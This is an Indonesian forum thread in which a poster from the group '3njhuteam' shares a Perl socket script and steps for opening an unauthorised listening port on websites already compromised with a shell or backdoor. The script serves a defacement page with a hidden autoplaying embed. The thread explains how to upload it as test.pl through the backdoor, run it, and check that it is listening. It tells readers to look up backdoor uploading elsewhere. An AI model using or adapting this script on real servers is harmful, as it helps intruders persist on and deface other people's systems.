Forum Codernate
Port iLegal With Perl Socket - Printable Version

+- Forum Codernate (https://forum.codernate.org)
+-- Forum: Pemrograman (https://forum.codernate.org/forumdisplay.php?fid=3)
+--- Forum: Pemograman Web (https://forum.codernate.org/forumdisplay.php?fid=24)
+---- Forum: Perl (https://forum.codernate.org/forumdisplay.php?fid=55)
+---- Thread: Port iLegal With Perl Socket (/showthread.php?tid=75)



Port iLegal With Perl Socket - P4KyU - 09-10-2017

hi.. 
jumpa lagi, seperti judul thread diatas. 
ane mau share sedikit tetang beberapa website yang sempat 3njhuteam melakukan request port secara ilegal melalui script perl. 

Perl Script download socket.pl
Code:
#!/usr/bin/perl -w
use strict;
use IO::Socket;

sub Wait {
    wait; # wait needed to keep <defunct> pids from building up
}

$SIG{CHLD} = \&Wait;

my $server = IO::Socket::INET->new(
    LocalPort     => 1337, # set port
    Type         => SOCK_STREAM,
    Reuse         => 1,
    Listen         => 10) or die "$@\n";
my $client ;

while($client = $server->accept()) {
    select $client;
    print $client "HTTP/1.0 200 OK\r\n";
    print $client "Content-type: text/html\r\n\r\n";
    print $client '<title>opss
</title><H1>3nJhuTeam  ft. 2U</H1><BR><H2>Love Yourself</H2><embed src="http://www.youtube.com/v/iyMQRVA2pnc&amp;autoplay=1&amp;loop=1&amp;playlist=iyMQRVA2pnc" type="application/x-shockwave-flash" wmode="transparent" height="1" width="1"></embed>'; # set your html content
}
continue {
    close($client); #kills hangs
    kill CHLD => -$$;
}

bisa dilhat dari sini
Code:
my $server = IO::Socket::INET->new(
    LocalPort     => 1337, # set port
    Type         => SOCK_STREAM,


ada code yang tertulis new yang dimana code tersebut akan membuka port baru. dan localport disini listning port kita memakai port 1337. terseserah ya. sesuai selera anda saja. 

cara eksekusinya.? 
slow down. anda harus mempunyai akses shell/backdoor dari salah satu website. caranya.? not learning for upload shell, please search google for information backdoor site. 

sebagai contoh, ini adalah target untuk listning port ilegal. show ini belum di eksekusi.
[Image: A5-WHTP3SeyXS8-pQzBfzg.png]


cara eksekusi script perl. anggap saja saya udah mempunyai akses shell/backdoor pada target tersebut.

upload script perl tersebut dengan extensi pl atau test.pl lalu buka command pada shell/backdoor lalau jalankan dengan perintah 
Quote:perl test.pl

jika sudah menjalan script tersebut lalu buka salah satu website yang satu server shared dengan port yang telah diatur sebelumnya pada script perl. 
contohnya script tersebut kami menyimpan dengan nama socket.pl 
[Image: HJfsm9eEQPmA2q23laljLA.png]
untuk menentukan apakah script tersebut berjalan atau tidak bisa jalankan perintah ini di console
Quote:ps aux | grep 'perl'

ops scriptnya jalan.
[Image: IEXLglMdTTKocvIG-AXhAw.png]
kita cek apakah listning portnya berjalan. 
opss.. berhasil.... 
[Image: Q0gMJ1PbTMqjlQJ6akI5ag.png]

Referensi : http://www.binarytides.com/perl-socket-programming-tutorial/